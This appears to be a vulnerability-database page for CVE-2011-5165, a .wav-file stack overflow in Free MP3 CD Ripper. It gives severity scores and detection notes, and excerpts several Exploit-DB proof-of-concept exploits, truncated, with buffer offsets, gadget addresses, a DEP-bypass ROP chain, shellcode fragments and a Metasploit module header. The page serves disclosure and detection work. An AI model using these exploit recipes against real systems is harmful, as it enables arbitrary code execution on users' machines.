CVE-2011-5165
published 2012-09-15CVE-2011-5165: Stack-based buffer overflow in Free MP3 CD Ripper 1.1, 2.6 and earlier, when converting a file, allows user-assisted remote attackers to execute arbitrary code…
PriorityP346critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
37.00%
98.3th percentile
Stack-based buffer overflow in Free MP3 CD Ripper 1.1, 2.6 and earlier, when converting a file, allows user-assisted remote attackers to execute arbitrary code via a crafted .wav file.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cleanersoft | free_mp3_cd_ripper | <= 2.6 | — |
| cleanersoft | free_mp3_cd_ripper | — | — |
| cleanersoft | free_mp3_cd_ripper | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
41 x 4116 bytes (offset to SEH) + EB 06 FF FF (nSEH short jump) + 79 2A E4 66 (SEH: POP ESI ogg.dll @ 0x66E42A79)
bytes↗
41 x 4112 bytes + 32 FA CA 76 (JMP ESP imagehlp) + 90 x 10 + shellcode
bytes↗
41 x 4112 bytes + D7 30 9D 7C (EIP 0x7C9D30D7) + 90 x 3 + shellcode
bytes↗
41 x 4112 bytes + DC 3A B4 76 (RET) + 90 x 15 + shellcode
- →Trigger condition: crafted .wav file opened via the application's 'wav to mp3' converter function causes a stack-based buffer overflow at offset 4112–4116 bytes into the file, overwriting the return address or SEH chain. ↗
- →SEH-based exploitation variant: look for .wav files where bytes 4116–4119 contain a short jump (EB 06 FF FF) followed by a 4-byte SEH handler address — more reliable across Windows 7 and 8 targets than vanilla EIP overwrite. ↗
- →Vanilla EIP overwrite variant: .wav files with 4112 bytes of padding ('A'/0x41) followed by a 4-byte JMP ESP gadget address and NOP sled — targets Windows XP SP2/SP3. ↗
- →Malicious .wav files exploiting this CVE will not conform to valid WAV RIFF chunk structure — the file content is raw binary padding followed by exploit bytes rather than a valid audio container. ↗
- →Bad characters for payload encoding in this vulnerability are \x00, \x0a, \x0d, \x20 — payloads in malicious .wav files should not contain these bytes. ↗
- →The exploited modules are ogg.dll (POP ESI gadget) and libFLAC.dll (POP/POP/RET gadget) loaded by Free MP3 CD Ripper — monitor for abnormal execution originating from these DLLs. ↗
- ·The 0x7C9D30D7 EIP gadget is OS-specific and does not work on Windows 7; the SEH-based exploit using ogg.dll (0x66E42A79) is required for Windows 7 and 8 targets. ↗
- ·The Metasploit module target (0x1001860b p/p/r in libFLAC.dll) is specific to Windows XP SP3 English; no other OS targets are defined in that module. ↗
- ·The vanilla EIP overwrite PoC (0x76cafa32 JMP ESP in imagehlp.dll) was tested only on Windows XP SP2 and may not be reliable on other OS versions. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Free MP3 CD Ripper 2.6 2.8 (Windows 7) - '.wav' File Buffer Overflow (SEH) (DEP Bypass)
exploitdb·2015-04-24
CVE-2011-5165 Free MP3 CD Ripper 2.6 2.8 (Windows 7) - '.wav' File Buffer Overflow (SEH) (DEP Bypass)
Free MP3 CD Ripper 2.6 2.8 (Windows 7) - '.wav' File Buffer Overflow (SEH) (DEP Bypass)
---
#!/usr/bin/python
# original p0c https://www.exploit-db.com/exploits/36465/
# credit to TUNISIAN CYBER
# modified SEH Exploit https://www.exploit-db.com/exploits/36826/
# credit to ThreatActor at CoreRed.com
# Software Link: https://www.exploit-db.com/apps/64215b82be8bb2e749f95fec5b51d3e4-FMCRSetup.exe
# Tested on: Windows 7 Ultimate X64
# Added DEP Bypass to the exploit
# naxxo ([email protected])
import struct
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x004103fe, # POP EAX # RETN [fcrip.exe]
0x004e91f4, # ptr to &VirtualAlloc() [IAT fcrip.exe]
0x00418ff8, # MOV EAX,DWORD PTR DS:[EAX] # RETN [fcrip.exe]
0x00446c97, # PUSH EAX # POP ESI # POP EB
Exploit-DB
Free MP3 CD Ripper 2.6 2.8 - '.wav' File Buffer Overflow (SEH)
exploitdb·2015-04-23
CVE-2011-5165 Free MP3 CD Ripper 2.6 2.8 - '.wav' File Buffer Overflow (SEH)
Free MP3 CD Ripper 2.6 2.8 - '.wav' File Buffer Overflow (SEH)
---
#!/usr/bin/env perl
# original p0c https://www.exploit-db.com/exploits/36465/
# credit to TUNISIAN CYBER
# however he was attemping to vanilla buffer overflow
# in fact it is SEH based exploit
# using the address 0x7C9D30D7 is limit the targets
#which I assume belongs to OS file didn't work on win7
#yes he did find a buffer overflow since the offset reaches ESP before SEH
#in this app, SEH based exploits are more effective and the main vuln in this case should be SEH
#This p0c > win 7s & 8s
# ThreatActor at CoreRed.com
##
my $file = "p0c.wav";
my $buff = "A" x 4116; # offset to SEH
my $nseh = "\xeb\x06\xff\xff"; #dat 8 jmp
my $seh = pack('V', 0x66E42A79); # 66E42A79 5E POP ESI ogg.dll
my $nop = "\x90" x 28;
#msfvenom -p
Exploit-DB
Free MP3 CD Ripper 2.6 - '.wav' Local Buffer Overflow
exploitdb·2015-03-22
CVE-2011-5165 Free MP3 CD Ripper 2.6 - '.wav' Local Buffer Overflow
Free MP3 CD Ripper 2.6 - '.wav' Local Buffer Overflow
---
#!/usr/bin/python
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: Free MP3 CD Ripper All versions Local Buffer Overflow
#[+] Date: 20-03-2015
#[+] Type: Local Exploits
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor: http://www.commentcamarche.net/download/telecharger-34082200-free-mp3-cd-ripper
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
## EDB Note: Didn't work with Windows 7.
from struct import pack
file="evilfile.wav"
junk="\x41"*4112
eip = pack('<I',0x7C9D30D7)
nops = "\x90" * 3
#Calc.exe Shellcode
#POC:http://youtu.be/_uvHKonqO2g
shellcode = ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1\x1e\x58\x31\x78"
"\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3"
"\xb4\xae\x7d\x0
Exploit-DB
Free MP3 CD Ripper 1.1 - '.wav' Local Stack Buffer Overflow (Metasploit)
exploitdb·2011-11-22
CVE-2011-5165 Free MP3 CD Ripper 1.1 - '.wav' Local Stack Buffer Overflow (Metasploit)
Free MP3 CD Ripper 1.1 - '.wav' Local Stack Buffer Overflow (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Free MP3 CD Ripper 1.1 (WAV File) Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow found in Free MP3 CD
Ripper 1.1. The overflow is triggered when an unsuspecting user opens a malicious
WAV file.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Richard Leahy', # Initial discovery
'X-h4ck', # msf module is based on his poc
'Tiago Henriques', # msf module
'James Fitts' # clean ups
]
Exploit-DB
Free MP3 CD Ripper 1.1 - Local Buffer Overflow
exploitdb·2011-08-27
CVE-2011-5165 Free MP3 CD Ripper 1.1 - Local Buffer Overflow
Free MP3 CD Ripper 1.1 - Local Buffer Overflow
---
# ############################################################################
# Exploit Title : Free MP3 CD Ripper 1.1 Local Buffer Overflow
# Software : http://www.brothersoft.com/free-mp3-cd-ripper-84543.html
# Version : 1.1
# Tested on : Windows xp sp3 (en)
# Date : 27/08/2011
# Author : X-h4ck
# Website : http://www.pirate.al , http://theflashcrew.blogspot.com
# Email : [email protected]
# Greetz : Wulns~ - Danzel - IllyrianWarrior- Ace - M4yh3m - Saldeath
# mywisdom - bi0 - Slimshaddy - d3trimentaL - Lekosta - Rigon
# H-Down - H3ll - Pretorian
# ############################################################################
filename = "3v1lf1l3.wav"
print "cr34t1ng 3v1l f1l3"
junk ="\x41" * 4112
ret = "\xDC\x3A\xB4\x76"
nopsled = "\x9
Exploit-DB
Free MP3 CD Ripper 2.6 - '.wav' Local Overflow
exploitdb·2010-04-02
CVE-2011-5165 Free MP3 CD Ripper 2.6 - '.wav' Local Overflow
Free MP3 CD Ripper 2.6 - '.wav' Local Overflow
---
# Exploit Title: Free MP3 CD Ripper 2.6 0 day
# Date: 30/03/2010
# Author: Richard leahy
# Reference: http://www.exploit-db.com/exploits/11975/
# Software Link: http://www.soft32.com/Download/Free/Free_MP3_CD_Ripper/4-250188-1.html
# Version: 2.6
# Tested on: Windows Xp Sp2
#to exploit this open up the application select file -> wav converter -> wav to mp3
#use your favourite programming language and print out the contents into a text file. save the text file as a .wav
#then open up the wav file and boom.
#feel free to email me [email protected]
#code
nop = "\x90"
#imagehlp
jmp_esp = [0x76cafa32].pack('V')
#shellcode opens notepad
shellcode =
"\xd9\xc7\xd9\x74\x24\xf4\xba\xcc\x7a\xcb\xf7\x33\xc9\xb1" +
"\x33\x5e\x83\xee\xfc\x3
Exploit-DB
Free MP3 CD Ripper 2.6 - '.wav' Local Stack Buffer Overflow
exploitdb·2010-03-31
CVE-2011-5165 Free MP3 CD Ripper 2.6 - '.wav' Local Stack Buffer Overflow
Free MP3 CD Ripper 2.6 - '.wav' Local Stack Buffer Overflow
---
Exploit-DB
Free MP3 CD Ripper 2.6 - '.wav' (PoC)
exploitdb·2010-03-30
CVE-2011-5165 Free MP3 CD Ripper 2.6 - '.wav' (PoC)
Free MP3 CD Ripper 2.6 - '.wav' (PoC)
---
# Exploit Title: Free MP3 CD Ripper 2.6 (wav) 0-day
# Date: 30/03/2010
# Author: Richard leahy
# Software Link: http://www.soft32.com/Download/Free/Free_MP3_CD_Ripper/4-250188-1.html
# Version: 2.6
# Tested on: Windows Xp Sp2
#to exploit this open up the application select file -> wav converter -> wav to mp3
#use your favourite programming language and print out the contents into a text file. save the text #file as a .wav
#then open up the wav file and boom.
#feel free to email me [email protected]
#code
!#/usr/bin/env ruby
nop = "\x90" # nop
shellcode = "\xCC" #just an interupt can be replaced by proper shellcode
jmp_esp = "\x32\xfa\xca\x76" #find a jmp esp i will use imagehlp , little endian so reverse it
boom = "A" * 4112 + jmp_esp +
Metasploit
Free MP3 CD Ripper 1.1 WAV File Stack Buffer Overflow
metasploit
Free MP3 CD Ripper 1.1 WAV File Stack Buffer Overflow
Free MP3 CD Ripper 1.1 WAV File Stack Buffer Overflow
This module exploits a stack based buffer overflow found in Free MP3 CD Ripper 1.1. The overflow is triggered when an unsuspecting user opens a malicious WAV file.
http://secunia.com/advisories/39193http://www.exploit-db.com/exploits/11975http://www.exploit-db.com/exploits/11976http://www.exploit-db.com/exploits/17727http://www.exploit-db.com/exploits/18142http://www.osvdb.org/63349http://www.securityfocus.com/bid/39672https://www.exploit-db.com/exploits/36465/https://www.exploit-db.com/exploits/36826/https://www.exploit-db.com/exploits/36827/http://secunia.com/advisories/39193http://www.exploit-db.com/exploits/11975http://www.exploit-db.com/exploits/11976http://www.exploit-db.com/exploits/17727http://www.exploit-db.com/exploits/18142http://www.osvdb.org/63349http://www.securityfocus.com/bid/39672https://www.exploit-db.com/exploits/36465/https://www.exploit-db.com/exploits/36826/https://www.exploit-db.com/exploits/36827/
2012-09-15
Published